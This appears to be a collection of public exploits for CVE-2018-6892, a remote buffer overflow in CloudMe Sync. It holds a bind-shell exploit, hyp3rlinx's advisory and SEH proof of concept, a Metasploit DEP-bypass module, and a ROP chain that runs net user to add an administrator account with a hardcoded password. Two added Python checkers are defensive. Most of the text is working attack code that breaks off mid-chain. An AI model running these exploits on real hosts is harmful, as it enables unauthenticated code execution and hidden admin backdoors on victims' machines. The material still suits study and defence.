shellcode += "\x1c\x39\xa0\x18\xb5\xe4\x21\xa1\xd8\x16\x9c\xe6\xe4"
shellcode += "\x94\x14\x97\x12\x84\x5d\x92\x5f\x02\x8e\xee\xf0\xe7"
shellcode += "\xb0\x5d\xf0\x2d"
ip=raw_input('[+] CloudMe Target IP> ')
stack_pivot=struct.pack('<L',0x61d95f58) # {pivot 3492 / 0xda4} (Lands us into rop nop chain --> rop_chain) : SUB ESP,8 # ADD ESP,0D8C # POP EBX # POP ESI # POP EDI # POP EBP # RETN 0x08 ** [Qt5Gui.dll] ** | {PAGE_EXECUTE_READ}
rop_nop1=struct.pack('<L',0x68b1a714) * 300 # RETN 0x10 ** [Qt5Core.dll] ** | {PAGE_EXECUTE_READ}
rop_nop2=struct.pack('<L',0x61c6fc53) * 50 # RETN ** [Qt5Gui.dll] ** | {PAGE_EXECUTE_READ}
nop = "\x90" * 20
payload = "A" * 2236 + stack_pivot + rop_nop1 + rop_nop2 + rop_chain + nop + shellcode + "B"*(5600-len(rop_nop1)-len(rop_nop2)-len(rop_chain)-len(nop)-len(shellcode))
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip,8888))
s.send(payload)
print 'Sending buffer overflow to CloudMe Service'
print 'Target Should be Running a Bind Shell on Port 4444!'
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/CLOUDME-SYNC-UNAUTHENTICATED-REMOTE-BUFFER-OVERFLOW.txt
[+] ISR: Apparition Security
[+] SSD Beyond Security Submission: https://blogs.securiteam.com/index.php/archives/3669
Vendor:
=============
www.cloudme.com
Product:
===========
CloudMe Sync <= v1.10.9
(CloudMe_1109.exe)
hash: 0e83351dbf86562a70d1999df7674aa0
CloudMe is a file storage service operated by CloudMe AB that offers cloud storage, file synchronization and client software.
It features a blue folder that appears on all devices with the same content, all files are synchronized between devices.
Vulnerability Type:
===================
Buffer Overflow
CVE Reference:
==============
CVE-2018-6892
Security Issue:
================
Unauthenticated remote attackers that can connect to the "CloudMe Sync" client application listening on port 8888 can send a malicious payload causing
a buffer overflow condition. This results in the attacker controlling the program's execution flow and allows arbitrary code execution on the victim's PC.
CloudMe Sync client creates a socket listening on TCP Port 8888 (0x22B8)
In Qt5Core:
00564DF1 . C74424 04 B822>MOV DWORD PTR SS:[ESP+4],22B8
00564DF9 . 890424 MOV DWORD PTR SS:[ESP],EAX
00564DFC . FF15 B8738100 CALL DWORD PTR DS:[<&Qt5Network._ZN10QTc>; Qt5Netwo._ZN10QTcpServer6listenERK12QHostAddresst
C:\>netstat -ano | findstr 8888
TCP 0.0.0.0:8888 0.0.0.0:0 LISTENING 15504
TCP [::]:8888 [::]:0 LISTENING 15504
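As an added defensive example, not part of hyp3rlinx's advisory: a Python 3 checker that inspects a client-to-server TCP payload captured on its way to the CloudMe listener on port 8888 and flags the traits this advisory documents (a length reaching the roughly 1075-byte EIP overwrite, a long single-byte filler run, and the three non-ASLR pop/pop/ret addresses listed under "Buffer Overflow"). The two samples and the 256-byte run threshold are constructed assumptions, not captured traffic.

```python
import struct
from typing import List, NamedTuple, Tuple

CLOUDME_PORT = 8888
# Figures from the advisory: EIP is overwritten at about 1075 bytes, the SEH record at 2232.
EIP_OVERWRITE_OFFSET = 1075
SEH_OVERWRITE_OFFSET = 2232
# Non-ASLR "pop ebx # pop esi # ret 0x20" addresses the advisory lists. They sit
# little-endian inside a payload, so each is packed with '<L' before searching.
KNOWN_GADGETS = {
    0x6FE6909D: "libstdc++-6.dll",
    0x00476795: "CloudMe.exe",
    0x61E7B7F6: "Qt5Gui.dll",
}
MIN_FILLER_RUN = 256  # constructed threshold: a run of one byte this long is filler, not protocol data


class Finding(NamedTuple):
    verdict: str        # "ignore" (other port), "benign" or "alert"
    reasons: List[str]


def longest_run(data: bytes) -> Tuple[int, int]:
    """Return (length, byte value) of the longest run of one repeated byte; (0, -1) when empty."""
    best_len, best_byte = 0, -1
    i = 0
    while i < len(data):
        j = i
        while j < len(data) and data[j] == data[i]:
            j += 1
        if j - i > best_len:
            best_len, best_byte = j - i, data[i]
        i = j
    return best_len, best_byte


def find_gadgets(data: bytes) -> List[str]:
    """Report every known gadget address present in the payload, with the offset of its first hit."""
    hits = []
    for addr, module in KNOWN_GADGETS.items():
        off = data.find(struct.pack("<L", addr))
        if off != -1:
            hits.append("known gadget 0x%08x [%s] at offset %d" % (addr, module, off))
    return hits


def inspect_payload(dst_port: int, data: bytes) -> Finding:
    """Classify one TCP payload destined for the CloudMe listener."""
    if dst_port != CLOUDME_PORT:
        return Finding("ignore", ["destination port %d is not the CloudMe listener" % dst_port])
    reasons = []
    if len(data) >= EIP_OVERWRITE_OFFSET:
        reasons.append("payload length %d reaches the EIP overwrite offset (%d)"
                       % (len(data), EIP_OVERWRITE_OFFSET))
    run_len, run_byte = longest_run(data)
    if run_len >= MIN_FILLER_RUN:
        reasons.append("%d-byte filler run of 0x%02x" % (run_len, run_byte))
    reasons.extend(find_gadgets(data))
    return Finding("alert" if reasons else "benign", reasons)


# Constructed samples, not captured traffic: a short message, and an oversized buffer
# that places the Qt5Gui.dll address right after 2232 bytes of junk and a 4-byte nSEH.
BENIGN_SAMPLE = b"hello cloudme\r\n"
SUSPECT_SAMPLE = (b"A" * SEH_OVERWRITE_OFFSET + b"\x90" * 4
                  + struct.pack("<L", 0x61E7B7F6) + b"B" * 64)

if __name__ == "__main__":
    for sample in (BENIGN_SAMPLE, SUSPECT_SAMPLE):
        finding = inspect_payload(CLOUDME_PORT, sample)
        print(finding.verdict + ": " + ("; ".join(finding.reasons) or "no indicators"))
```

Feed it the reassembled payload of each new connection to port 8888 (for example from a packet capture); the SEH-offset hit is the strongest signal, the other two cover variants that swap the handler address.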
Buffer Overflow:
================
EIP register will be overwritten at about 1075 bytes.
EAX 00000001
ECX 76F698DA msvcrt.76F698DA
EDX 00350000
EBX 41414141
ESP 0028D470
EBP 41414141
ESI 41414141
EDI 41414141
EIP 41414141
Stack Dump:
==========
(508.524): Access violation - code c0000005 (first/second chance not available)
*** ERROR: Symbol file could not be found. Defaulted to export symbols for ntdll.dll -
eax=00000000 ebx=00000000 ecx=41414141 edx=778f353d esi=00000000 edi=00000000
eip=41414141 esp=00091474 ebp=00091494 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
41414141 ?? ???
Exploitation is straightforward because ASLR and SafeSEH are both set to false on the loaded modules, making the exploit portable and able to work across different operating systems.
We will therefore use a Structured Exception Handler (SEH) overwrite for our exploit.
e.g.
6FE6909D 0x6fe6909d : pop ebx # pop esi # ret 0x20 | {PAGE_EXECUTE_READ} [libstdc++-6.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Users\victimo\AppData\Local\Programs\CloudMe\CloudMe\libstdc++-6.dll)
00476795 0x00476795 : pop ebx # pop esi # ret 0x20 | startnull {PAGE_EXECUTE_READ} [CloudMe.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Users\victimo\AppData\Local\Programs\CloudMe\CloudMe\CloudMe.exe)
61E7B7F6 0x61e7b7f6 : pop ebx # pop esi # ret 0x20 | {PAGE_EXECUTE_READ} [Qt5Gui.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v5.9.0.0 (C:\Users\victimo\AppData\Local\Programs\CloudMe\CloudMe\Qt5Gui.dll)
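The mona lines above show ASLR and SafeSEH False on libstdc++-6.dll, CloudMe.exe and Qt5Gui.dll, which is what lets fixed addresses work across installs. As an added defensive example that is not part of the advisory, the stdlib-only Python 3 checker below reads a PE file's DllCharacteristics word and lists the header-level mitigations a module lacks (SafeSEH is recorded in the load config directory and is out of scope here); build_minimal_pe is a constructed test fixture, not a real binary.

```python
import struct
import sys
from typing import List

# IMAGE_DLLCHARACTERISTICS_* bits of the PE optional header (winnt.h)
MITIGATION_BITS = [
    (0x0040, "DYNAMIC_BASE (ASLR)"),
    (0x0100, "NX_COMPAT (DEP)"),
    (0x0400, "NO_SEH"),
    (0x4000, "GUARD_CF"),
]
# DllCharacteristics sits at the same offset in IMAGE_OPTIONAL_HEADER32 and IMAGE_OPTIONAL_HEADER64
DLLCHARACTERISTICS_OFFSET = 70


def dll_characteristics(image: bytes) -> int:
    """Return the DllCharacteristics word of a PE image; ValueError if the headers are malformed."""
    if len(image) < 0x40 or image[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found at e_lfanew")
    opt = e_lfanew + 4 + 20                        # skip signature and IMAGE_FILE_HEADER
    if len(image) < opt + DLLCHARACTERISTICS_OFFSET + 2:
        raise ValueError("truncated optional header")
    magic = struct.unpack_from("<H", image, opt)[0]
    if magic not in (0x10B, 0x20B):                # PE32 or PE32+
        raise ValueError("unexpected optional header magic 0x%x" % magic)
    return struct.unpack_from("<H", image, opt + DLLCHARACTERISTICS_OFFSET)[0]


def missing_mitigations(image: bytes) -> List[str]:
    """Names of the header-level mitigations that are switched off in this image."""
    flags = dll_characteristics(image)
    return [name for bit, name in MITIGATION_BITS if not flags & bit]


def check_file(path: str) -> List[str]:
    """Check one file on disk; the headers live in the first pages, so 64 KiB is plenty."""
    with open(path, "rb") as f:
        return missing_mitigations(f.read(64 * 1024))


def build_minimal_pe(flags: int, pe32plus: bool = False) -> bytes:
    """Constructed fixture: MZ stub, PE signature, COFF header and a zeroed optional header."""
    e_lfanew = 0x40
    dos_stub = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)   # exactly 0x40 bytes
    opt_size = 0xF0 if pe32plus else 0xE0
    machine = 0x8664 if pe32plus else 0x14C
    coff = struct.pack("<HHIIIHH", machine, 0, 0, 0, 0, opt_size, 0x2102)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x20B if pe32plus else 0x10B)
    struct.pack_into("<H", opt, DLLCHARACTERISTICS_OFFSET, flags)
    return dos_stub + b"PE\0\0" + coff + bytes(opt)


if __name__ == "__main__":
    for path in sys.argv[1:]:
        gone = check_file(path)
        print("%s: %s" % (path, ", ".join(gone) or "all header mitigations enabled"))
```

Running it over the DLLs in the CloudMe install directory is the quick way to confirm whether a given build still ships modules with these bits cleared.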
0day Exploit POC:
==============
import socket,struct
print 'CloudMe Sync v1.10.9'
print 'Unauthenticated Remote Buffer Overflow 0day'
print 'Discovery/credits: hyp3rlinx'
print 'apparition security\n'
#shellcode to pop calc.exe Windows 7 SP1
sc=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B"
"\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B"
"\x4B\x18\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31"
"\xC0\x99\x32\x17\x66\xC1\xCA\x01\xAE\x75\xF7\x66\x81\xFA"
"\x10\xF5\xE0\xE2\x75\xCF\x8B\x53\x24\x01\xEA\x0F\xB7\x14"
"\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68\x2E\x65\x78\x65"
"\x68\x63\x61\x6C\x63\x54\x87\x04\x24\x50\xFF\xD5\xCC")
ip=raw_input('[+] CloudMe Target IP> ')
nseh="\xEB\x06"+"\x90"*2 #JMP
seh=struct.pack('<L',0x61e7b7f6) #POP,POP RET
junk="A"*2232+nseh+seh+sc+"B"*5600
payload=junk+nseh+seh+sc
def PwnMe(ip,payload):
    s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((ip,8888))
    s.send(payload)
    print 'Sending buffer overflow packetz'
    raw_input()
if __name__ == '__main__':
    PwnMe(ip,payload)
References:
============
https://www.cloudme.com/en/sync#
https://blogs.securiteam.com/index.php/archives/3669
POC Video URL:
=============
https://vimeo.com/255280060
Network Access:
===============
Remote
Severity:
=========
High
Disclosure Timeline:
=============================
SSD Vulnerability submission: January 17, 2018
I would like to acknowledge Beyond Security's SSD program for its help coordinating the disclosure of this vulnerability.
More details can be found on their blog at:
https://blogs.securiteam.com/index.php/archives/3669
February 11, 2018 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
# Exploit Title: Cloudme 1.9 - Buffer Overflow (DEP) (Metasploit)
# Date: 2018-08-13
# Exploit Author: Raymond Wellnitz
# Vendor Homepage: https://www.cloudme.com
# Version: 1.8.x/1.9.x
# Tested on: Windows 7 x64
# CVE : 2018-6892
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Remote::Tcp

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Cloudme v1.8.x/v1.9.x Buffer Overflow with DEP-Bypass',
      'Description'    => %q{
        This module exploits a stack buffer overflow in Cloudme v1.8.x/v1.9.x.
      },
      'Author'         => [ 'Raymond Wellnitz' ],
      'References'     =>
        [
          [ 'CVE', 'CVE-2018-6892' ],
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
        },
      'Platform'       => 'win',
      'Privileged'     => true,
      'Payload'        =>
        {
          'Space'    => 600,
          'BadChars' => "\x00"
        },
      'Targets'        =>
        [
          [ 'Windows x86_32/64', { 'Ret' => 0x6cfa88a2 } ],
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => '11.02.2018'))

    register_options([ Opt::RPORT(8888) ])
  end

  def create_rop_chain()
    rop_gadgets = [
      0x6cf98182, # POP EAX # RETN [icuin49.dll]
      0x68c848d8, # ptr to &VirtualProtect() [IAT Qt5Core.dll]
      0x61b4d226, # MOV EAX,DWORD PTR DS:[EAX] # RETN [Qt5Gui.dll]
      0x668d8261, # XCHG EAX,ESI # RETN [libGLESv2.dll]
      0x68a5c297, # POP EBP # RETN [Qt5Core.dll]
      0x688dd45d, # & JMP ESP [Qt5Core.dll]
      0x68abe868, # POP EAX # RETN [Qt5Core.dll]
      0xfffffdff, # 201
      0x1004b263, # NEG EAX # RETN [LIBEAY32.dll]
      0x689687d2, # XCHG EAX,EBX # RETN
      0x68abe868, # POP EAX # RETN [Qt5Core.dll]
      0xffffffc0, # 40
      0x1004b263, # NEG EAX # RETN [LIBEAY32.dll]
      0x6751d479, # XCHG EAX,EDX # RETN [icuuc49.dll]
      0x100010c7, # POP ECX # RETN [LIBEAY32.dll]
      0x6494ea0a, # &Writable location [libwinpthread-1.dll]
      0x68a49534, # POP EDI # RETN [Qt5Core.dll]
      0x1008df82, # RETN (ROP NOP) [LIBEAY32.dll]
      0x68ad025b, # POP EAX # RETN [Qt5Core.dll]
      0x90909090, # NOPS
      0x6759bdb4, # PUSHAD # RETN [icuuc49.dll]
    ].flatten.pack("V*")
    return rop_gadgets
  end

  def exploit
    connect
    sploit = rand_text_alpha_upper(1036)
    sploit << create_rop_chain()
    sploit << make_nops(30)
    sploit << payload.encoded
    print_status("Trying target #{target.name}...")
    sock.put(sploit + "\r\n\r\n")
    handler
    disconnect
  end
end
# Exploit Title: CloudMe 1.11.2 - Buffer Overflow ROP (DEP,ASLR)
# Exploit Author: Bobby Cooke (boku)
# CVE: CVE-2018-6892
# Date: 2020-09-29
# Vendor Homepage: https://www.cloudme.com/
# Software Link: https://www.cloudme.com/downloads/CloudMe_1112.exe
# Version: 1.11.2
# Tested On: Windows 10 (x64) - 10.0.19041 Build 19041
# Script: Python 2.7
# Notes:
# This exploit uses MSVCRT.System to create a new user (boku:0v3R9000!) and add the new user to the
# Administrators group. A requirement of successful exploitation is that the CloudMe.exe process must be
# running as administrator, such as when run with 'Run as Administrator', as this permission is required
# to create new users on the system. This exploit has been tested against multiple Windows 10 systems
# including x86, x64, Pro, Education, Home; although there is no guarantee it will work in your CTF.
# CloudMe 1.11.2 - Turing Complete Add-Admin ROP (DEP,ASLR)
import os,sys,socket,struct
from colorama import Fore, Back, Style
F = [Fore.RESET,Fore.BLACK,Fore.RED,Fore.GREEN,Fore.YELLOW,Fore.BLUE,Fore.MAGENTA,Fore.CYAN,Fore.WHITE]
B = [Back.RESET,Back.BLACK,Back.RED,Back.GREEN,Back.YELLOW,Back.BLUE,Back.MAGENTA,Back.CYAN,Back.WHITE]
S = [Style.RESET_ALL,Style.DIM,Style.NORMAL,Style.BRIGHT]
ok = S[3]+F[2]+')'+F[5]+'+++'+F[2]+'['+F[8]+'========> '+S[0]+F[0]
err = S[3]+F[2]+'<========'+F[2]+'['+F[5]+'+++'+F[2]+'( '+F[0]+S[0]
def formatMsg(STRING):
    return ok+S[3]+F[5]+STRING+S[0]
def formatErr(STRING):
    return err+S[3]+F[2]+STRING+S[0]
# Base | Top | Rebase | SafeSEH | ASLR | NXCompat | OS Dll | Modulename
# -------------------------------------------------------------------------------------------------------
# 0x69900000 | 0x69ac1000 | False | False | False | False | False | [Qt5Network.dll]
# 0x6eb40000 | 0x6eb64000 | False | False | False | False | False | [libgcc_s_dw2-1.dll]
# 0x68a80000 | 0x69055000 | False | False | False | False | False | [Qt5Core.dll]
# 0x00400000 | 0x00831000 | False | False | False | False | False | [CloudMe.exe]
# 0x6d9c0000 | 0x6da0c000 | False | False | False | False | False | [Qt5Sql.dll]
# 0x64b40000 | 0x64b5b000 | False | False | False | False | False | [libwinpthread-1.dll]
# 0x66e00000 | 0x66e3d000 | False | False | False | False | False | [Qt5Xml.dll]
def getESP_RC():
    GaDG3Tz = [
        # ESP -> EDI
        # Clobbers: BL # [EBX+5E5B10C4] must be writable # Requires ROPNOP
        # Address=68F79000 Size=0007A000 (499712.) Owner=Qt5Core 68A80000 Section=.eh_fram Type=Imag 01001002 Access=RWE CopyOnWr
        0x68bb4678, # POP EBX # RETN [Qt5Core.dll]
        0x0A9C8F3C, # EBX + 0x5E5B10C4 = 0x68F7A000 = Writeable Memory
        0x68d5e818, # PUSH ESP # OR BL,DL # INC DWORD PTR DS:[EBX+5E5B10C4] # POP EDI # RETN 0x04 [Qt5Core.dll]
        0x68D50537, # RETN - ROPNOP
        0x68D50537  # RETN - ROPNOP
    ]
    print(formatMsg("Get ESP ROP Chain built!"))
    return ''.join(struct.pack('<I', _) for _ in GaDG3Tz)
def msvcrt_rop_chain():
    GaDG3Tz = [
        # HMODULE LoadLibraryA( LPCSTR lpLibFileName);
        # $ ==> > CALL to LoadLibraryA
        # $+4 > FileName = "msvcrt.dll"
        # EAX = 0x512 = 1298
        0x68aec6ab, # POP EAX # RETN [Qt5Core.dll]
        0xFFFFFAEE, # NEG FFFFFAEE = 0x512
        0x68cef5b2, # NEG EAX # RETN [Qt5Core.dll]
        # EDI + EAX = End of string "msvcrt.dll"
        0x68fc83b0, # add edi, eax # add eax, 41140e0a # ret [Qt5Core.dll]
        # EAX = 0x01
        0x68aec6ab, # POP EAX # RETN [Qt5Core.dll]
        0xFFFFFFFF, # NEG FFFFFFfF = 0x01
        0x68cef5b2, # NEG EAX # RETN [Qt5Core.dll]
        # EAX = 0x0
        0x68c7aa16, # DEC EAX # RETN [Qt5Core.dll]
        # ECX = 0x0
        0x68be726b, # XCHG EAX,ECX # RETN [Qt5Core.dll]
        # Terminate String "msvcrt.dll"
        0x68cee06d, # XOR ESI,ESI # RETN [Qt5Core.dll] (Clear ESI)
        0x68fbed52, # ADD ESI,EDI # ADD AL,0A # RETN [Qt5Core.dll] (EDI -> ESI)
        0x68fa9d0d, # mov [esi], cl # adc al, 41 # ret [Qt5Core.dll]
        # EAX = -0xA = 0xFFFFFFF6
        0x68aec6ab, # POP EAX # RETN [Qt5Core.dll]
        0xFFFFFFF6, # -0xA
        # ESI = Start of string "msvcrt.dll\x00"
        0x68c050c0, # ADD ESI,EAX # INC EBP # RETN [Qt5Core.dll]
        # EAX = PTR LoadLibraryA (from CloudMe Import Table)
        # CloudMe Address=0081A168 Section=.idata Type=Import (Known) Name=KERNEL32.LoadLibraryA
        0x68aec6ab, # POP EAX # RETN [Qt5Core.dll]
        0xFF7E5E98, # NEG FF7E5E98 = 0081A168 = PTR Kernel32.LoadLibraryA
        0x68cef5b2, # NEG EAX # RETN [Qt5Core.dll]
        # EAX = kernel32.LoadLibraryA
        0x699030c5, # mov eax,dword ptr ds:[eax] [Qt5Network.dll]
        # ESI = kernel32.LoadLibraryA # EAX = Addr string "msvcrt.dll\x00"
        0x68d50536, # XCHG EAX,ESI # RETN [Qt5Core.dll]
        # For PUSHAD we need: EDI=FarRETN # ESI=&LoadLibraryA # EAX=["msvcrt.dll"] # ECX=ROPNOP
        0x68d32800, # POP ECX # RETN [Qt5Core.dll]
        0x68D50537, # RETN - ROPNOP
        0x699f37ad, # POP EDI # RETN [Qt5Network.dll]
        0x6990F972, # RETN 10 [Qt5Network.dll]
        0x68f7bc5e, # pushad # ret # [Qt5Core.dll]
        # EAX -> EBP = msvcrt.dll
        0x68cc462c  # XCHG EAX,EBP # RETN [Qt5Core.dll]
        # EBP = msvcrt.dll
    ]
    print(formatMsg("LoadLibraryA(LPSTR \"msvcrt.dll\") ROP Chain built!"))
    return ''.join(struct.pack('<I', _) for _ in GaDG3Tz)
def GetProc_system_rop_chain():
    GaDG3Tz = [
        # FARPROC GetProcAddress( HMODULE hModule, LPCSTR lpProcName);
        # $ ==> > CALL to GetProcAddress # EDX (ROPNOP)
        # $+4 > hModule = [msvcrt] # ECX
        # $+8 > ProcNameOrOrdinal (system) # EAX
        # EAX = 0x4a2 = 1186
        0x68aec6ab, # POP EAX # RETN [Qt5Core.dll]
        0xFFFFFB5E, # NEG FFFFFB5E = 0x4A2
        0x68cef5b2, # NEG EAX # RETN [Qt5Core.dll]
        # EDI + EAX = End of string "system"
        0x68fc83b0, # add edi, eax # add eax, 41140e0a # ret [Qt5Core.dll]
        # EAX = 0x01
        0x68aec6ab, # POP EAX # RETN [Qt5Core.dll]
        0xFFFFFFFF, # NEG FFFFFFfF = 0x01
        0x68cef5b2, # NEG EAX # RETN [Qt5Core.dll]
        # EAX = 0x0
        0x68c7aa16, # DEC EAX # RETN [Qt5Core.dll]
        # ECX = 0x0
        0x68be726b, # XCHG EAX,ECX # RETN [Qt5Core.dll]
        # Terminate String "system"
        0x68cee06d, # XOR ESI,ESI # RETN [Qt5Core.dll] (Clear ESI)
        0x68fbed52, # ADD ESI,EDI # ADD AL,0A # RETN [Qt5Core.dll] (EDI -> ESI)
        0x68fa9d0d, # mov [esi], cl # adc al, 41 # ret [Qt5Core.dll]
        # EAX = -0x6 = 0xFFFFFFFA
        0x68aec6ab, # POP EAX # RETN [Qt5Core.dll]
        0xFFFFFFFA, # -0x6
        # ESI = Start of string "system\x00"
        0x68c050c0, # ADD ESI,EAX # INC EBP # RETN [Qt5Core.dll]
        0x68fcf58d, # DEC EBP # RETN [Qt5Core.dll](fix EBP for prev gadgets)
        # EAX = PTR GetProcAddr (from CloudMe Import Table)
        # CloudMe Address=0081A148 # Section=.idata # Type=Import # Name=KERNEL32.GetProcAddress
        0x68aec6ab, # POP EAX # RETN [Qt5Core.dll]
        0xFF7E5EB8, # NEG FF7E5EB8 = 0081A148 = PTR Kernel32.GetProcAddr
        0x68cef5b2, # NEG EAX # RETN [Qt5Core.dll]
        0x699030c5, # mov eax,dword ptr ds:[eax] [Qt5Network.dll]
        0x68b48196, # XCHG EAX,ESI # RETN [Qt5Core.dll]
        0x68be726b, # XCHG EAX,ECX # RETN [Qt5Core.dll]
        # ESI = &kernel32.GetProcAddr # ECX=["system\x00"]# EBP=msvcrt.dll
        # For PUSHAD we need: EDI=FarRETN # ESI=&GetProcAddress # ECX=msvcrt.dll # EAX=["system"]# EDX=ROPNOP
        # EBP -> EAX = msvcrt.dll
        0x68cc462c, # XCHG EAX,EBP # RETN [Qt5Core.dll]
        # ECX=&msvcrt.dll # EAX=["system\x00"]
        0x68be726b, # XCHG EAX,ECX # RETN [Qt5Core.dll]
        # EDX=ROPNOP
        0x68f94685, # POP EDX # RETN [Qt5Core.dll]
        0x68D50537, # RETN - ROPNOP
        # EDI=FarRETN
        0x699f37ad, # POP EDI # RETN [Qt5Network.dll]
        0x699010B4, # ret 0C [Qt5Network.dll]
        # KERNEL32.GetProcAddress [ESI pushed to stack]
        # [EBP pushed to stack]
        # [ESP pushed to stack]
        # [EBX pushed to stack]
        # land after ret 0xC -> Qt5Core.68D50537 (ROPNOP) [EDX pushed to stack]
        # MSVCRT.75F60000 [ECX pushed to stack]
        # ASCII "system" [EAX pushed to stack]
        0X68f7bc5e, # pushad # ret # [Qt5Core.dll]
        0x68b1df17  # XCHG EAX,EDX # RETN # [Qt5Core.dll]
        # EDX = msvcrt.system
    ]
    print(formatMsg("GetProcAddress(HMODULE msvcrt, LPCSTR system) ROP Chain built!"))
    return ''.join(struct.pack('<I', _) for _ in GaDG3Tz)
def addUsr_rop_chain():
    GaDG3Tz = [
        # int system( const char *command);
        # $ ==> > CALL to system
        # $+4 > command = "net user boku 0v3R9000! /add"
        # EAX = 0x438 = 1080
        0x68aec6ab, # POP EAX # RETN [Qt5Core.dll]
        0xFFFFFBC8, # NEG 0xFFFFFBC8 = 0x438
        0x68cef5b2, # NEG EAX # RETN [Qt5Core.dll]
        # EDI + EAX = End of string "net user..."
        0x68fc83b0, # add edi, eax # add eax, 41140e0a # ret [Qt5Core.dll]
        # EAX = 0x01
        0x68aec6ab, # POP EAX # RETN [Qt5Core.dll]
        0xFFFFFFFF, # NEG FFFFFFfF = 0x01
        0x68cef5b2, # NEG EAX # RETN [Qt5Core.dll]
        # EAX = 0x0
        0x68c7aa16, # DEC EAX # RETN [Qt5Core.dll]
        # ECX = 0x0
        0x68be726b, # XCHG EAX,ECX # RETN [Qt5Core.dll]
        # Terminate String "net user..."
        0x68cee06d, # XOR ESI,ESI # RETN [Qt5Core.dll] (Clear ESI)
        0x68fbed52, # ADD ESI,EDI # ADD AL,0A # RETN [Qt5Core.dll] (EDI -> ESI)
        0x68fa9d0d, # mov [esi], cl # adc al, 41 # ret [Qt5Core.dll]
        # EAX = -28 = -0x1C = 0xFFFFFFE4
        0x68aec6ab, # POP EAX # RETN [Qt5Core.dll]
        0xFFFFFFE4, # -28 = -0x1C
        # ESI = Start of string "net user...\x00"
        0x68c050c0, # ADD ESI,EAX # INC EBP # RETN [Qt5Core.dll]
        # EDX = MSVCRT.system # ECX=0x0
        # For PUSHAD we need: EDI=FarRETN # ESI=MSVCRT.system # EAX=["net user.."] # ECX=POP+RET
        0x68d32800, # POP ECX # RETN [Qt5Core.dll]
        0x699f37ad, # POP EDI # RETN [Qt5Network.dll]
        # ESI = MSVCRT.system # EAX = ["net user.."]
        0x68b1df17, # XCHG EAX,EDX # RETN # [Qt5Core.dll]
        0x68b48196, # XCHG EAX,ESI # RETN [Qt5Core.dll]
        # EDI=FarRETN
        0x699f37ad, # POP EDI # RETN [Qt5Network.dll]
        0x6990F972, # RETN 10 [Qt5Network.dll]
        # PUSHAD - Setup Call to MSVCRT.system on stack
        0X68f7bc5e  # pushad # ret # [Qt5Core.dll]
    ]
    print(formatMsg("system(const char* \"net user boku 0v3R9000! /add\") ROP Chain built!"))
    return ''.join(struct.pack('<I', _) for _ in GaDG3Tz)
def addAdm_rop_chain():
    GaDG3Tz = [
        # ESI = msvcrt.system
        # ESI -> EDX
        0x68b48196, # XCHG EAX,ESI # RETN [Qt5Core.dll]
        0x68b1df17, # XCHG EAX,EDX # RETN # [Qt5Core.dll]
        # EAX = 0x3F7
        0x68aec6ab, # POP EAX # RETN [Qt5Core.dll]
        0xFFFFFC09, # NEG 0xFFFFFC09 = 0x3F7
        0x68cef5b2, # NEG EAX # RETN [Qt5Core.dll]
        # EDI + EAX = End of string "net local..."
        0x68fc83b0, # add edi, eax # add eax, 41140e0a # ret [Qt5Core.dll]
        # EAX = 0x01
        0x68aec6ab, # POP EAX # RETN [Qt5Core.dll]
        0xFFFFFFFF, # NEG FFFFFFfF = 0x01
        0x68cef5b2, # NEG EAX # RETN [Qt5Core.dll]
        # EAX = 0x0
        0x68c7aa16, # DEC EAX # RETN [Qt5Core.dll]
        # ECX = 0x0
        0x68be726b, # XCHG EAX,ECX # RETN [Qt5Core.dll]
        # Terminate String "net local..."
        0x68cee06d, # XOR ESI,ESI # RETN [Qt5Core.dll] (Clear ESI)
        0x68fbed52, # ADD ESI,EDI # ADD AL,0A # RETN [Qt5Core.dll] (EDI -> ESI)
        0x68fa9d0d, # mov [esi], cl # adc al, 41 # ret [Qt5Core.dll]
        # EAX = -39 = -0x27 = 0xFFFFFFD9
        0x68aec6ab, # POP EAX # RETN [Qt5Core.dll]
        0xFFFFFFD9, # -39 = -0x27
        # ESI = Start of string "net local...\x00"
        0x68c050c0, # ADD ESI,EAX # INC EBP # RETN [Qt5Core.dll]
        # EDX = MSVCRT.system # ECX=0x0
        # For PUSHAD we need: EDI=FarRETN # ESI=MSVCRT.system # EAX=["net local.."] # ECX=ROPNOP
        0x68d32800, # POP ECX # RETN [Qt5Core.dll]
        0x699f37ad, # POP EDI # RETN [Qt5Network.dll]
        # ESI = MSVCRT.system # EAX = ["net local.."]
        0x68b1df17, # XCHG EAX,EDX # RETN # [Qt5Core.dll]
        0x68b48196, # XCHG EAX,ESI # RETN [Qt5Core.dll]
        # EDI=FarRETN
